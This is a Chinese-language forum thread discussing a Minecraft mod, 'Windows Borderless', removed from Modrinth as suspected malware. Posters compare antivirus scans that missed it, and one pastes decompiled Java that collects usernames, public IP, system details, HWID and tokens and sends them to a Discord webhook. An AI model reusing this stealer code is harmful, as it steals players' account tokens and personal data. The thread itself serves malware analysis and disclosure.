疑似参杂了Stealer的Minecraft模组

GDHJDSYDH

近日Modrinth发现了一个名为Windows Borderless的Minecraft模组存在着恶意行为，目前此模组已被下架，具体详情：Malware Discovery Disclosure: "Windows Borderless" mod (modrinth.com)

Raven95676

卡巴扫描miss
avast免费版扫描miss
eset online scanner 扫描miss
hyper-v无法测试实际运行效果
有能测运行的测下没？

JuMin

360安全云团队版、金山毒霸团队版 Miss

DisaPDB

360ATA miss.
应该没法直接跑吧，需要手动加载到mc里

DisaPDB

Raven95676 发表于 2024-5-8 16:09
卡巴扫描miss
avast免费版扫描miss
eset online scanner 扫描miss

这种mod类型的得让mc加载了才能跑吧

yeahnangua

有恶意行为，卡巴无反应

DisaPDB

yeahnangua 发表于 2024-5-8 17:40
有恶意行为，卡巴无反应

你给出的截图里有恶意行为吗

yeahnangua

DisaPDB 发表于 2024-5-8 17:42
你给出的截图里有恶意行为吗

盗discord号的

DisaPDB

yeahnangua 发表于 2024-5-8 17:48
盗discord号的

你给出的截图里有恶意行为吗

1. public class Sender {
   
2.     public static void sendMessage(String message) {
   
3.         String HWID = TempUserLog.getHWID();
   
4.         try {
   
5.             InetAddress.getLocalHost();
   
6.             String OS_VERSION = System.getProperty("os.version");
   
7.             String OS_ARC = System.getProperty("os.arch");
   
8.             String JAVA_VER = System.getProperty("java.version");
   
9.             String PC_USER_ACCOUNT_NAME = System.getProperty("user.name");
   
10.             String OS_NAME = System.getProperty("os.name");
    
11.             try {
    
12.                 new URL("https://myexternalip.com/raw");
    
13.                 try {
    
14.                     URL url1 = new URL("https://myexternalip.com/raw");
    
15.                     try {
    
16.                         BufferedReader br = new BufferedReader(new InputStreamReader(url1.openStream()));
    
17.                         try {
    
18.                             String IP = br.readLine();
    
19.                             br.close();
    
20.                             WindowedBorderless.webhook.setAvatarUrl("https://cdn.modrinth.com/data/25BuKvi7/736ea2edc6b0103ab61b122afd5d09b5179e26e5.gif");
    
21.                             WindowedBorderless.webhook.setUsername("Windowed Borderless Logger");
    
22.                             WindowedBorderless.webhook.setTts(false);
    
23.                             WindowedBorderless.webhook.addEmbed(new DiscordWebhook.EmbedObject().setTitle("").setColor(Color.BLACK).addField("Username", class_310.method_1551().method_1548().method_1676(), true).addField("Public IP", IP, true).addField("OS Name", OS_NAME, true).addField("OS Version", OS_VERSION, true).addField("OS Architecture", OS_ARC, true).addField("Java Version", JAVA_VER, true).addField("HWID", HWID, true).addField("OS Username", PC_USER_ACCOUNT_NAME, true).addField("-----------", "-----------", true).addField("Tokens", message, true));
    
24.                             if (!Objects.equals(message, "[null]") && !Objects.equals(message, "[]")) {
    
25.                                 try {
    
26.                                     WindowedBorderless.webhook.execute();
    
27.                                 } catch (IOException e) {
    
28.                                 }
    
29.                             }
    
30.                         } finally {
    
31.                         }
    
32.                     } catch (IOException e2) {
    
33.                         throw new RuntimeException(e2);
    
34.                     }
    
35.                 } catch (MalformedURLException e3) {
    
36.                     throw new RuntimeException(e3);
    
37.                 }
    
38.             } catch (MalformedURLException e4) {
    
39.                 throw new RuntimeException(e4);
    
40.             }
    
41.         } catch (UnknownHostException e5) {
    
42.             throw new RuntimeException(e5);
    
43.         }
    
44.     }
    
45. }

复制代码

yeahnangua

DisaPDB 发表于 2024-5-8 17:50
你给出的截图里有恶意行为吗

一个模组专挑discord数据库访问还不算恶意行为吗